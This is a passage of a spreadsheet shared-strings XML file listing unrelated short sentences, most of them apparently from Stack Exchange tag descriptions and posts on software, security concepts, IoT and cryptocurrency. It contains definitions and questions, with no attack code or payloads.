ACID Transactions: Data lakes typically have multiple data pipelines reading and writing data concurrently, and data engineers have to go through a tedious process to ensure data integrity, due to the lack of transactions.</t>
  </si>
  <si>
    <t>This mechanism bears a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information or take state-changing actions.</t>
  </si>
  <si>
    <t>See the HID Usage Tables v1.12 document for more information about HID usage values.</t>
  </si>
  <si>
    <t>The larger the program the greater the obfuscation, as code becomes intertwined linking different segments through out the program.</t>
  </si>
  <si>
    <t>This method replaces the conventional procedure of verification course viz SMS , thus plummeting the cost and escalating the steadfastness of the verification procedure.</t>
  </si>
  <si>
    <t>Data is processed fairly and lawfully
Data shouldn't be given away without permission
Data should be relevant and not excessive
Data should be accurate and up to date
Data should only be kept for as long as necessary
Individuals have the right to check data which is about them
Data should be securely kept
Data must not be transferred to another country without adequate data protection
People involved include the data subject - the person who the data is about and the data controller - the person in charge of handling the data.</t>
  </si>
  <si>
    <t>Further, doing the new OAuth process on the Arduino is very costly in terms of memory.</t>
  </si>
  <si>
    <t>It was designed by the US National Security Agency (NSA).</t>
  </si>
  <si>
    <t>Yosys is an open-source framework for (Verilog) HDL synthesis and formal verification.</t>
  </si>
  <si>
    <t>It was designed by US National Security Agency (NSA).</t>
  </si>
  <si>
    <t>An audit trail (also called audit log) is a security-relevant chronological record, set of records, and/or destination and source of records that provide documentary evidence of the sequence of activities that have affected at any time a specific operation, procedure, or event.</t>
  </si>
  <si>
    <t>This level of protection is referred to as 2-safe replication in computer science theory.</t>
  </si>
  <si>
    <t>As part of the Product Activation system, a unique HWID number is generated when the operating system is first installed.</t>
  </si>
  <si>
    <t>In computer programming, deep magic refers to techniques that are not widely known, and may be deliberately kept secret.</t>
  </si>
  <si>
    <t>The OmiseGO blockchain team has been involved in the Ethereum community from its very beginningstarting in 2015, Omise Blockchain Lab began research work focusing primarily on scalability.</t>
  </si>
  <si>
    <t>Though a design with an independent, external watchdog timer is typically more robust and reliable.</t>
  </si>
  <si>
    <t>User Acceptance Testing (UAT) is a process to obtain confirmation that a system meets mutually agreed-upon requirements.</t>
  </si>
  <si>
    <t>Having a public token that never expires is not a good idea in principle: if an entity captures and manages to decrypt the message on it's way to the Cloud it could use the token to impersonate the device and you wouldn't know its not the device... That's the reason why a good practice is to renew the SAS token regularly.</t>
  </si>
  <si>
    <t>SoapUI is a desktop application for inspecting, invoking, monitoring, simulating/mocking as well as functional testing, security testing, performance &amp; load testing, compliance testing, and surveillance testing of SOAP/WSDL and REST/WADL web services.</t>
  </si>
  <si>
    <t>This means that all of our products have gone through a rigorous testing and quality assurance process to make sure that no matter what front end you use, the spell checker will work, all the time.</t>
  </si>
  <si>
    <t>Although there is a popular notion about hackers being Internet criminals, some renowned computer programmers reject this idea by calling themselves hackers.</t>
  </si>
  <si>
    <t>I have a long record of accurate flagging and experience with the moderation tools I currently have available:
Active 1141 days, 1094 consecutive 
1,474 helpful flags, (~99% success rate)
5,212 review tasks
870 edits
8,432 votes cast
Gold tag badge holder and experienced duplicate hammer user
~1,000,000 people reached (whatever that means)
Even without mod tools, I have uncovered fraudsters and voting rings on several occasions, and mod tools would no doubt help me to uncover more fraud more-often.</t>
  </si>
  <si>
    <t>Trying to encrypt software or apply software keys to it or something like that is at best a futile attempt and at worst can often cause issues with software performance and usability.</t>
  </si>
  <si>
    <t>Ideally, such tools would automatically find security flaws with a high degree of confidence that what is found is indeed a flaw.</t>
  </si>
  <si>
    <t>For most of the more common and popular formats, Tika then provides content extraction, metadata extraction and language identification capabilities.</t>
  </si>
  <si>
    <t>There is also an active, maintained and popular fork of PIL called Pillow which releases quarterly with security updates, new features and bug fixes.</t>
  </si>
  <si>
    <t>This does not guarantee correctness of the transaction in all ways the application programmer might have wanted (that is the responsibility of application-level code) but merely that any programming errors cannot result in the violation of any defined rules.</t>
  </si>
  <si>
    <t>The different patterns and principles used in GRASP are: Controller, Creator, Indirection, Information Expert, High Cohesion, Low Coupling, Polymorphism, Protected Variations, and Pure Fabrication.</t>
  </si>
  <si>
    <t>According to the RFC 3161 standard, a trusted timestamp is a timestamp issued by a trusted third party (TTP) acting as a Time Stamping Authority (TSA).</t>
  </si>
  <si>
    <t>The term "server" can also be used for a computer running one or more server applications, which often exhibit special needs regarding performance, availability and security.</t>
  </si>
  <si>
    <t>Litecoin is a peer-to-peer cryptocurrency and open source software project released under the MIT/X11 license.</t>
  </si>
  <si>
    <t>Because of the versatility and power of modern re-identification algorithms, the absence of PII data does not mean that the remaining data does not identify individuals.</t>
  </si>
  <si>
    <t>Commercial use of automated theorem proving is mostly concentrated in integrated circuit design and verification.</t>
  </si>
  <si>
    <t>I found this document, it say that Watson IoT Platform blockchain integration supports connecting to both IBM Blockchain fabrics and Hyperledger fabrics
(in section Config Blockchain IBM environment)
But I can not find any guideline.</t>
  </si>
  <si>
    <t>RSA Archer eGRC Solutions allow you to build an efficient, collaborative enterprise governance, risk and compliance (eGRC) program across IT, finance, operations and legal domains.</t>
  </si>
  <si>
    <t>The Pimpl idiom, also known as the compilation firewall or Cheshire Cat technique, is a "private implementation" technique useful in C++ and other similar statically compiled languages.</t>
  </si>
  <si>
    <t>Data transmission is an increasingly important part of software design, particularly with regard to the secure transmission of private information and the variety of ways that data can be trasmitted.</t>
  </si>
  <si>
    <t>The PHP Quality Assurance Team uses these scripts to test the engine, verify bug fixes, and maintain a stable build.</t>
  </si>
  <si>
    <t>These routines allow a process running with superuser privileges to lock specified portions of its virtual address space into physical memory.</t>
  </si>
  <si>
    <t>Identifiers contain the information needed to exactly describe an object in a persistent store (like the primary key in the database), although the detailed information is not exposed.</t>
  </si>
  <si>
    <t>The SOAP Fault element defines the following four subelements:
faultcode
The faultcode element is intended for use by software to provide an algorithmic mechanism for identifying the fault.</t>
  </si>
  <si>
    <t>There are two Google people APIs:
The new People API lets you list the people in the authenticated users' contacts and retrieve profile information for authenticated users and their contacts.</t>
  </si>
  <si>
    <t>More about web application security and best practices:
Open Web Application Security Project (OWASP) - Their Top 10 list is a good starting point.</t>
  </si>
  <si>
    <t>A JVM also enables such features as automated exception handling, which provides "root-cause" debugging information for every software error (exception), independent of the source code.</t>
  </si>
  <si>
    <t>Other popular uses include security surveillance and computer vision and there are also uses on sites like video broadcasting services and for recording social videos .</t>
  </si>
  <si>
    <t>You have already accepted similar risk with the Arduino programming you have done thus far, this has fewer protections and more risk.</t>
  </si>
  <si>
    <t>Specifically your computer USB port usually has some good protection that you need not to worry about.</t>
  </si>
  <si>
    <t>OpenID is an open standard that describes how users can be authenticated in a decentralized manner.</t>
  </si>
  <si>
    <t>Fortress is an open source, standards based Identity and Access Management SDK, written in Java.</t>
  </si>
  <si>
    <t>To identify items being tested, the feature to be tested, the testing task to be performed, the personnel responsible for each task and the risks associated with the plan.</t>
  </si>
  <si>
    <t>You can quickly and securely trade bitcoins with other people around the world with your local currency
The MtGox API provides methods to access information from the market, place orders, and more.</t>
  </si>
  <si>
    <t>Data Execution Prevention (DEP) is a security feature of modern operating systems and CPUs intended to prevent the execution of code/data located in a memory region not explicitly marked as executable.</t>
  </si>
  <si>
    <t>This layer of security includes several protections:
Integrity Protection
Authentication
Confidentiality (Privacy Protection)
Unlike the standard Socket and ServerSocket, SSLSocket and SSLServerSocket instances must be acquired via their respective factory.</t>
  </si>
  <si>
    <t>Approach using pseudoterminals and good-old select to read file descriptors
Each of the approaches is bundled in a try_[SOME APPROACH] function.</t>
  </si>
  <si>
    <t>Armory is an open source wallet management platform for the Bitcoin network, designed to provide the highest level of security for heavily-invested Bitcoin users.</t>
  </si>
  <si>
    <t>Biometrics is a set of methods related to unique identification of people based on physiological or behavioural traits</t>
  </si>
  <si>
    <t>Hundreds of different computer network protocols have been developed each designed for specific purposes and environments.</t>
  </si>
  <si>
    <t>CONSOLE CODE:
Then I get Memory protection violation.</t>
  </si>
  <si>
    <t>Hash trees allow efficient and secure verification of the contents of large data structures.</t>
  </si>
  <si>
    <t>The currently valid Prolog standard documents can be obtained from national member bodies like ANSI or directly from ISO.</t>
  </si>
  <si>
    <t>Graylog is an integrated Open Source log capture and analysis solution for operational intelligence.</t>
  </si>
  <si>
    <t>ClamAV is open source antivirus software for email, command line, web and database</t>
  </si>
  <si>
    <t>Microsoft's Information Protection solutions is streamlining effort across Windows, Office, and Azure for information protection services.</t>
  </si>
  <si>
    <t>The Resilient File System (ReFS) is Microsoft's newest file system, designed to maximize data availability, scale efficiently to large data sets across diverse workloads, and provide data integrity by means of resiliency to corruption.</t>
  </si>
  <si>
    <t>One is certification process with certification, private-key, rootCA.</t>
  </si>
  <si>
    <t>Any user process, even a process with superuser permission, will receive EPERM.</t>
  </si>
  <si>
    <t>Failure to do this will cause the application to receive a segmentation fault.</t>
  </si>
  <si>
    <t>Used by services, systems , programs and etc to uniquely identify the user.</t>
  </si>
  <si>
    <t>NIS or Network Information Service is a directory service protocol for distributing system configuration data such as user and host names between computers on a computer network.</t>
  </si>
  <si>
    <t>HL7 messages are used for exchanging elecronic health information.</t>
  </si>
  <si>
    <t>Tampering: is a process for doing Security testing of web application</t>
  </si>
  <si>
    <t>It can be used as a tool for debugging memory leaks.</t>
  </si>
  <si>
    <t>A proxy is a device or program that stands between two or more interconnected programs or devices.</t>
  </si>
  <si>
    <t>Currency is a medium of exchange of value, usually referring to government issued denominations.</t>
  </si>
  <si>
    <t>The Dafny static program verifier can be used to verify the functional correctness of programs.</t>
  </si>
  <si>
    <t>There are also code obfuscation contests designed to challenge programmers.</t>
  </si>
  <si>
    <t>https://dev.windows.com/en-us/develop/app-certification-kit</t>
  </si>
  <si>
    <t>XML Audit File Financial is a Dutch standard for exchanging information between accounting packages and/or Dutch IRS.</t>
  </si>
  <si>
    <t>It was the last version of Delphi which could be used without mandatory software activation.</t>
  </si>
  <si>
    <t>This makes it possible to use Frama-C for the formal verification of C programs.</t>
  </si>
  <si>
    <t>In networking, the term  is used to describe a variety of ways in which hardware and software can be fooled.</t>
  </si>
  <si>
    <t>While coding standards can be somewhat informal, defined by a small team or corporation for internal use, most adopted standards aim to provide a formal definition of their rules, the reasoning behind each rule, and whether (and how) compliance with those rules may be verified.</t>
  </si>
  <si>
    <t>However, the Alliance has generally enforced its use to describe only a narrow range of connectivity technologies including wireless local area network (WLAN) based on the IEEE 802.11 standards, device to device connectivity [such as Wi-Fi Peer to Peer AKA Wi-Fi Direct], and a range of technologies that support PAN, LAN and even WAN connections.</t>
  </si>
  <si>
    <t>I've already contributed by:
Flagging helpfully over 9,800 times
Completing over 20,000 reviews
Participating actively on Meta 
Taking part in chat (mainly JavaScript and MSE's Tavern)
I have experience using moderation tools as a trusted user on Aviation.SE, and I've also been moderating a small forum since 2012.</t>
  </si>
  <si>
    <t>Dotfuscator provides application self-protection and obfuscation for any type of .NET app through a combination of binary obfuscation/hardening, detection, defense and alert controls.</t>
  </si>
  <si>
    <t>The feature consists of default connection requirements that conform to best practices for secure connections.</t>
  </si>
  <si>
    <t>A key-value pair is a set of two linked data items: a key which uniquely identifies some item of data, and the value, which is either the data that is identified or a pointer to the location of that data.</t>
  </si>
  <si>
    <t>Due to its ease of use and the way in which it stores information, it is used to author configuration files for various software programs in its e*X*tended form xml</t>
  </si>
  <si>
    <t>The AntiXSS Library is a .NET assembly provided as part of the Web Protection Library, a Microsoft Open Source project.</t>
  </si>
  <si>
    <t>Dotfuscator, also known as PreEmptive Protection, is a .NET Obfuscator and Application Self Protection Tool.</t>
  </si>
  <si>
    <t>The project was founded by Intel's Open Source Technology Center.</t>
  </si>
  <si>
    <t>Allocating turret statically eliminates the possibility of pointer and memory management bugs and reduces the chance of leaks.</t>
  </si>
  <si>
    <t>From the security perspective, that approach does not reflect the best practice, as you would have to add permissions for accessing the service endpoint to the client(via shared access keys), and this might be a security risk.</t>
  </si>
  <si>
    <t>SOAP 1.2 refers to the latest version of the Simple Open Access Protocol - a protocol used in exchanging structured information through web services.</t>
  </si>
  <si>
    <t>Computer misuse involves making viruses, hacking, stealing other's data, creating fake websites and internet fraud</t>
  </si>
  <si>
    <t>In the Windows context, driver signing, a form of code signing, refers to Microsoft's requirements that device driver binaries be signed with a certificate whose provenance Microsoft trusts, e.g.</t>
  </si>
  <si>
    <t>Developers often include various cheats and other special features ("easter eggs") that are not explained in the packaged material, but have become part of the "buzz" about the game on the Internet and among gamers.</t>
  </si>
  <si>
    <t>Whenever an access violation occurs because one of the forked processes tries to write to a memory page, the kernel just copies the contents of that page.</t>
  </si>
  <si>
    <t>In order obtain an AICS test report for any device, you would need to visit register as a 'Azure Certified for IoT device' partner first through the portal -
https://catalog.azureiotsolutions.com/register
You can then submit your device for certification via the Partner dashboard, which will walk you through the process.</t>
  </si>
  <si>
    <t>All processes run in memory protected user space which allow QNX Neutrino to be robust yet scalable, even in the face of runtime errors in core services such as drivers.</t>
  </si>
  <si>
    <t>Some methods of copy protection have also led to criticisms because it caused inconvenience for honest users or secretly installed additional software to watch activity on user's computer to detect copying.</t>
  </si>
  <si>
    <t>Distributed, Redis-based locking to synchronize multiple Sidetiq processes.</t>
  </si>
  <si>
    <t>Before committing, each transaction verifies that no other transaction has modified the data it has read.</t>
  </si>
  <si>
    <t>A Wi-Fi enabled device such as a personal computer, video game console, smartphone, or digital audio player can connect to the Internet when within range of a wireless network connected to the Internet.</t>
  </si>
  <si>
    <t>You could disable the safety features with PRAGMA journal_mode = memory and/or PRAGMA synchronous = off, but
if the application using SQLite crashes in the middle of a transaction when the MEMORY journaling mode is set, then the database file will very likely go corrupt.</t>
  </si>
  <si>
    <t>The Do Not Track (DNT) header is the proposed HTTP header field DNT that requests that a web application disable either its tracking or cross-site user tracking (the ambiguity remains unresolved) of an individual user.</t>
  </si>
  <si>
    <t>DEP, the short for Data Execution Prevention, is a security feature included in recent operating systems meant to prevent an application or service from executing code from a non-executable memory region.</t>
  </si>
  <si>
    <t>Unlike token detectors, these tools only identify clones that match language structures, such as expressions, statements, or blocks; they can never propose "} {".</t>
  </si>
  <si>
    <t>Fuzzing or Fuzz-testing is a type of software test where the software is presented with invalid input to find errors in input validation and handling.</t>
  </si>
  <si>
    <t>It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and give them a choice to allow it or not.</t>
  </si>
  <si>
    <t>Identify resources you've tried to use (include links) 
Identify the target platforms 
Provide a code example that describes the problem (as long as it does not reveal sensitive information.)</t>
  </si>
  <si>
    <t>IVRs can be used to handle requests automatically; or to gather preliminary information from the caller such as identification and reason for calling, before routing the call on to an appropriate agent.</t>
  </si>
  <si>
    <t>The Dafny programming language is designed to support the static verification of programs.</t>
  </si>
  <si>
    <t>NBug is a .NET library created to automate the bug reporting process for WPF, WinForms, and console applications.</t>
  </si>
  <si>
    <t>There are many products that offer some levels of protection, like IonCube (commercial) and Zend Guard (commercial), but all can be broken with time and effort.</t>
  </si>
  <si>
    <t>Bugzilla is a Web-based bug tracking application.</t>
  </si>
  <si>
    <t>When the reconnection occurs:
DeviceClient StatusChangesHandler reports ConnectionStatus: Disconnected_Retrying and Reason: No_Network
IoT Hub Diagnostics reports 
deviceDisconnect =&gt; 404104 DeviceConnectionClosedRemotely
deviceConnect =&gt; 401003 IoTHubUnauthorized
deviceConnect =&gt; No error, successful
DeviceClient StatusChangesHandler reports ConnectionStatus: Connected and Reason: Connection_Ok
This is not a highly critical issue for our operation since at this stage it is a PoC and each reconnect takes about 2 seconds but, we'd like to know the root cause of this behaviour before we go live.</t>
  </si>
  <si>
    <t>A hotspot is a physical location where people may obtain Internet access, typically using Wi-Fi technology, via a wireless local area network (WLAN) using a router connected to an internet service provider.</t>
  </si>
  <si>
    <t>Android Lint is a tool in ADT which scans Android project sources for potential bugs.</t>
  </si>
  <si>
    <t>Digital object identifier, an international standard for document identification</t>
  </si>
  <si>
    <t>Android Lint is a tool in adt which scans android project sources for potential bugs.</t>
  </si>
  <si>
    <t>In this model, the cloud user patches and maintains the operating systems and the application software.</t>
  </si>
  <si>
    <t>Cuckoo Sandbox
Cuckoo is an open source automated malware analysis system.</t>
  </si>
  <si>
    <t>Obfuscation is the process by which the code is altered so that a developer finds it much harder to understand clearly what the intended program does or how it operates.</t>
  </si>
  <si>
    <t>QNX is the name of a family of products focused on real time and safety critical embedded systems written by QNX Software Systems.</t>
  </si>
  <si>
    <t>It is in principle possible to decrypt the message without possessing the key, but, for a well-designed encryption scheme, large computational resources and skill are required.</t>
  </si>
  <si>
    <t>Any people with more exp
Hardware: I have a Raspberry Pi behind a firewall that collects wireless sensor data.</t>
  </si>
  <si>
    <t>Everything below is for the firmware that you will have to develop and associate with the calls Gautham Kantharaju described.</t>
  </si>
  <si>
    <t>C:\iot-adk-addonkit\Tools\bsptools\QCDB410C\export.cmd C:\a8016aaattnwza21120000.2_db410c_bsp\DB410c_BSP
Run newproduct.cmd DemoDevice QCDB410C and choose to enter SMBIOS data to uniquely identify your device in SMBIOS.</t>
  </si>
  <si>
    <t>If you have firewall restrictions then your home device can report its health to virtual health device.</t>
  </si>
  <si>
    <t>By definition, firmware means the permanent software programmed into a read-only memory.</t>
  </si>
  <si>
    <t>In computer security, AAA commonly stands for authentication, authorization and accounting.</t>
  </si>
  <si>
    <t>Passport is a generic term for a travel document, often used in conjunction with user authentication frameworks.</t>
  </si>
  <si>
    <t>Artificial intelligence techniques applied to video games.</t>
  </si>
  <si>
    <t>BIML, Business Intelligence Markup Language, is a DSL that describes business intelligence entities (ETL, Cubes, Dimensions).</t>
  </si>
  <si>
    <t>Software and data can fall under ITAR, which can prohibit overseas teams from working on ITAR sensitive code.</t>
  </si>
  <si>
    <t>Wi-Fi Protected Access -  security protocol and security certification program to secure wireless computer networks.</t>
  </si>
  <si>
    <t>Taint checking is a security-related software analysis technique.</t>
  </si>
  <si>
    <t>OData defines an abstract data model and a protocol that let any client access information exposed by any data source.</t>
  </si>
  <si>
    <t>Properties may be tested by simulation or formal verification tools.</t>
  </si>
  <si>
    <t>a tool for statically checking C programs for security vulnerabilities and coding mistakes.</t>
  </si>
  <si>
    <t>BIRT stands for Business Intelligence Reporting Tool.</t>
  </si>
  <si>
    <t>In networking, the term 'spoofing' is used to describe a variety of ways in which hardware and software can be fooled.</t>
  </si>
  <si>
    <t>Eclipsys Corporation was a company that provided healthcare organizations with electronic medical record information systems.</t>
  </si>
  <si>
    <t>A session is a way of uniquely identifying an instance of usage of an application.</t>
  </si>
  <si>
    <t>It is used to authenticate Debian GNU/Linux software packages, in the DKIM message signing standard and many other applications.</t>
  </si>
  <si>
    <t>It was designed by Vincent Rijmen (co-creator of the Advanced Encryption Standard) and Paulo S. L. M. Barreto, who first described it in 2000.</t>
  </si>
  <si>
    <t>MooseFS is fault tolerant network distributed file system for POSIX compliant OSes.</t>
  </si>
  <si>
    <t>Userforms can be used:
To collect and verify information from a user before it's entered into a worksheet or document.</t>
  </si>
  <si>
    <t>keymapping covers configuration techniques and scripting, rather than tools and devices.</t>
  </si>
  <si>
    <t>Software-defined networking (SDN) is an approach to computer networking which evolved from work done at UC Berkeley and Stanford University around 2008.</t>
  </si>
  <si>
    <t>These actions are known as debugging, usually used when developing application or tracking bugs.</t>
  </si>
  <si>
    <t>About
The Gluu Server is an identity and access management suite comprised of free open source software (FOSS) components.</t>
  </si>
  <si>
    <t>Lint is a command which examines C source programs, detecting a number of bugs and obscurities.</t>
  </si>
  <si>
    <t>Jailbreak is a term that is used to describe the process of getting root access to a mobile device.</t>
  </si>
  <si>
    <t>JMockit is a Java mocking API with expressive recording &amp; verification syntax in JUnit/TestNG testing.</t>
  </si>
  <si>
    <t>The result of the process is encrypted information (in cryptography, referred to as ciphertext).</t>
  </si>
  <si>
    <t xml:space="preserve"> Oracle Business Intelligence Enterprise Edition, also termed OBI EE, is Oracle Corporation's set of business intelligence tools.</t>
  </si>
  <si>
    <t>The Trusted Platform Module is a secure cryptoprocessor defined by the Trusted Computing Group.</t>
  </si>
  <si>
    <t>Thus, CUBRID means a secure software which holds sensitive information.</t>
  </si>
  <si>
    <t>They have used software like vnc viewer, team viewer and else but the point is that they want something without having their clients involved with installing the software and sending them the password.</t>
  </si>
  <si>
    <t>Use function-constructor to identify questions involving the need to evaluate strings in any ECMAScript dialect while avoiding security risks associated with `eval`, such as script injection</t>
  </si>
  <si>
    <t>Software tokens are stored on a general-purpose electronic device such as a desktop computer, laptop, PDA, or mobile phone.</t>
  </si>
  <si>
    <t xml:space="preserve">
application-security encompasses measures taken throughout the
  code's life-cycle to prevent gaps in the security policy of an
  application or the underlying system (vulnerabilities) through flaws
  in the design, development, deployment, upgrade, or maintenance or
  database of the application.</t>
  </si>
  <si>
    <t>A socket address is the combination of an IP address (the location of the computer) and a port (which is mapped to the application program process) into a single identity, much like one end of a telephone connection is the combination of a phone number and a particular extension.</t>
  </si>
  <si>
    <t>the specification ISO 32000-1), its parsers are often incomplete (can't extract all information from all documents), and subject to security risks.</t>
  </si>
  <si>
    <t>While some attributes may be uniquely identifying on their own, any attribute can be identifying in combination with others.</t>
  </si>
  <si>
    <t>This technique is used by many *nix projects, often assisted by capability-detection tools.</t>
  </si>
  <si>
    <t>You may also be able to ask your on Law or Open Source if it is about open source licensing.</t>
  </si>
  <si>
    <t>I have seen that method being used by banks to communicate from online banking to a crypto-device.</t>
  </si>
  <si>
    <t>is an open source software library released under the gplv3 license that implements several perceptual hashing algorithms, and provides a c-like API to use those functions in your own programs.</t>
  </si>
  <si>
    <t>Its provided as a .NET open source class library that detects mobile devices and browsers, enhancing the information available to .NET programmers.</t>
  </si>
  <si>
    <t>In computer security, arbitrary code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process.</t>
  </si>
  <si>
    <t>A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications.</t>
  </si>
  <si>
    <t>Feature List
Author xlsx documents: Axlsx is made to let you easily and quickly generate professional xlsx based reports that can be validated before serialization.</t>
  </si>
  <si>
    <t>A web bug is an object that is embedded in a HTML document and is usually invisible to the user but allows checking that a user has viewed the document.One common use is in email tracking.</t>
  </si>
  <si>
    <t>DDMS is an Android SDK tool that provides port-forwarding services, screen capture on the device, thread and heap information on the device, logcat, process, and radio state information, incoming call and SMS spoofing, location data spoofing, and more.</t>
  </si>
  <si>
    <t>Authentication
Authentication refers to the process where an entity's identity is authenticated, typically by providing evidence that it holds a specific digital identity such as an identifier and the corresponding credentials.</t>
  </si>
  <si>
    <t>The ISO C standardization committee (ISO/IEC JTC1/SC22/WG14) defined two technical reports:
TR 24731-1: Extensions to the C Library Part I: Bounds-checking interfaces
This includes functions such as  and strcpy_s() and sprintf_s(), which should be in some sense more secure than earlier analogs in the standard C library, checking for null pointers and buffer overflows.</t>
  </si>
  <si>
    <t>Instead of registering a COM component on a computer during deployment, you create Win32-style manifest files at design time that contain information about binding and activation.</t>
  </si>
  <si>
    <t>Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way.</t>
  </si>
  <si>
    <t>Typical examples of devices containing firmware are embedded systems (such as traffic lights, consumer appliances, and digital watches), computers, computer peripherals, mobile phones, and digital cameras.</t>
  </si>
  <si>
    <t>The following list identifies information you should consider providing when creating your post (of course, do not post sensitive information like account names, passwords, machine names, etc):
Exchange Version: Exchange version and service pack.</t>
  </si>
  <si>
    <t>Specifically, a git configuration file often used to map multiple author entries to a single canonical author.</t>
  </si>
  <si>
    <t>Occasionally, the flashing software (balenaEtcher) fails to flash to the SD card, even though the SD is fully functional and not corrupted
Stats:
RaspberryPi Stats: RaspberryPi 3, Model B
Software: Raspbian (all versions)
Flashing Software: balenaEtcher
SD card Stats: SanDisk Industrial, 16 GB, micro SD
I have already tried re-instaling the software, formatted the SD, and installing other raspbian software (NOOBS is too big for the SD card).</t>
  </si>
  <si>
    <t>Libra is a cryptocurrency created by Facebook that is backed by stable currencies, and is built on top of the Libra Blockchain, a cryptographically authenticated database that acts as a public online ledger designed to handle thousands of transactions per second.</t>
  </si>
  <si>
    <t>If I ssh -X, that will open the program in the computer I'm sshing from, not on the TV.</t>
  </si>
  <si>
    <t>If you want to take the risk of your program crashing occasionally, then this is how you do it "simply"
I'll assume you have a subclass of QMainWindow in your program, but this will work added to any Qt class:
Alternatively, doing it the "definitely safe" way involves slightly more work.</t>
  </si>
  <si>
    <t>Dictionary attacks can be made more efficient (in terms of time to use) by pre-computing the hashes of all of the potential keys in the dictionary.</t>
  </si>
  <si>
    <t>Network Data Packets
The most common meaning of a sniffer is a software or hardware product that captures packets of data as they travel a computer network.</t>
  </si>
  <si>
    <t>It retains links to those sources, as well as a large number of other sources of strong identifiers (Library of Congress, New York Times, IMDB, etc), allowing cross-referencing among the various sources.</t>
  </si>
  <si>
    <t>Integrity, a PTC Product is a software system lifecycle management (SSLM) and application lifecycle management (ALM) platform developed by MKS Inc.</t>
  </si>
  <si>
    <t>Conforming to the NSSecureCoding protocol indicates that an object handles encoding and decoding instances of itself in a manner that is robust against object substitution attacks.</t>
  </si>
  <si>
    <t>The same is often happening when analyzing data with many dimensions (age, gender, number of transactions, ...) and projecting it on fewer dimensions, in the simple case by just dropping dimensions or by creating new dimensions like (might commit fraud).</t>
  </si>
  <si>
    <t>OpenID is an open standard that describes how users can be authenticated in a decentralized manner, eliminating the need for services to provide their own ad hoc systems and allowing users to consolidate their digital identities.</t>
  </si>
  <si>
    <t>Monetization Features include:
Virtual Currency - Create custom in-game currency
Virtual Goods - Deliver, manage, monetize and track virtual goods within your game
Payment Methods - All-in-one payment solution with billing providers and distribution channels.</t>
  </si>
  <si>
    <t>#
DefaultRuntimeDir ${APACHE_RUN_DIR}
#
# PidFile: The file in which the server should record its process
# identification number when it starts.</t>
  </si>
  <si>
    <t>It acted as if I had a very serious memory corruption, possibly triggered by an ISR.</t>
  </si>
  <si>
    <t>It's hard to say for sure but it looks like the HID report descriptor does not match your HID_SerialTouchReport structure.</t>
  </si>
  <si>
    <t>Snort is a open-source network intrusion detection/prevention system (NIDS/NIPS).</t>
  </si>
  <si>
    <t>PD supports distribution and fault-tolerance by embedding etcd.</t>
  </si>
  <si>
    <t>"Fortify 360" is the former name of a suite of application security analysis products made by Fortify Software.</t>
  </si>
  <si>
    <t>vCard is a file format standard for e-business cards to identify people and organisations.</t>
  </si>
  <si>
    <t>Freeware is free in meaning of paying no money for using this software.</t>
  </si>
  <si>
    <t>The name "Data Execution Prevention" is primarily used in the Windows contexts: other OSes may use different terms for the feature.</t>
  </si>
  <si>
    <t>For information about why signing files is important, see Introduction to Code Signing.</t>
  </si>
  <si>
    <t>It can process most common multimedia files and any DVD or BluRay sources that do not contain any copy protection.</t>
  </si>
  <si>
    <t>They are particularly intended for the protection of
  sensitive information such as private keys, as in PKCS #8 [25].</t>
  </si>
  <si>
    <t>When I run Netstat -tap:
user@user-desktop:~$ netstat -tap
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)</t>
  </si>
  <si>
    <t>The led matrix is connected to and ran by an arduino which
  will receive the matrix's pattern information from a decentralized
  program.</t>
  </si>
  <si>
    <t>This led to verification working on computer but not pi (as before)
raspbian version is stretch not sun 
tried self signed certificate verification.</t>
  </si>
  <si>
    <t>privateNetworkClientServer
  On Windows, this provides access to a home or work network  the app can send information to or from your computer and other computers on the same network.</t>
  </si>
  <si>
    <t>Also try the sqlite3 module: The underlying SQLite database is robust against power failures.</t>
  </si>
  <si>
    <t>Of course there is no risk of corruption from processes using different ends of the pipe at the same time.</t>
  </si>
  <si>
    <t>Re-entering code can corrupt the data structures and cause the kind of crash you described.</t>
  </si>
  <si>
    <t>Alarm structures
Define a structure for your alarm information.</t>
  </si>
  <si>
    <t>A hostname is a human-readable nickname that is assigned to a device connected to a computer network and that is used to identify the device.</t>
  </si>
  <si>
    <t>The IP address part that is not flagged by this mask identifies individual computers in the subnetwork.</t>
  </si>
  <si>
    <t>The contents of a data bag can vary, but they often include sensitive information (such as database passwords).</t>
  </si>
  <si>
    <t>those techniques allowing a machine to attest the identity of a human user by analyzing the image of his/her iris.</t>
  </si>
  <si>
    <t>Software that has been certified by official certification compaines of their respective technologies.</t>
  </si>
  <si>
    <t>Filenames are metadata about a file; a string used to uniquely identify a file stored on the file system of a computer.</t>
  </si>
  <si>
    <t>Sudo is a program for Unix and Unix-like computer operating systems that allows a user to run programs with the security privileges of another user (normally the superuser, or root).</t>
  </si>
  <si>
    <t>Tor is a free open-source application used for internet anonymity and anti-censorship.</t>
  </si>
  <si>
    <t>OSx86 (from Mac OS X and x86) is a collaborative hacking project to run the Mac OS X operating system on non-Apple personal computers with x86 architecture and x86-64 compatible processors.</t>
  </si>
  <si>
    <t>Code page is another term for character-encoding, popular with some vendors (IBM, Microsoft, Oracle, etc).</t>
  </si>
  <si>
    <t>Error tolerance is about the fact that all game developers create bugs.</t>
  </si>
  <si>
    <t>A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers.</t>
  </si>
  <si>
    <t>Cryptographic algorithms and identifiers for use with this
specification are described in the separate JSON Web Algorithms (JWA)
[JWA] specification and IANA registries defined by that
specification.</t>
  </si>
  <si>
    <t>Ironically, undocumented features themselves have become a major feature of computer games.</t>
  </si>
  <si>
    <t>Closed source APIs can also have undocumented functions that are not generally known.</t>
  </si>
  <si>
    <t>Windows users are agents, either human or software, which use a Windows computer or network service.</t>
  </si>
  <si>
    <t>Security testing as a term has a number of different meanings and can be completed in a number of different ways.</t>
  </si>
  <si>
    <t>For example, if you carry all your companys financial data on your portable computer, losing it could allow someone to access sensitive data that might hurt your business.</t>
  </si>
  <si>
    <t>hostapd is designed to be a "daemon" program that runs in the background and acts as the backend component controlling authentication.</t>
  </si>
  <si>
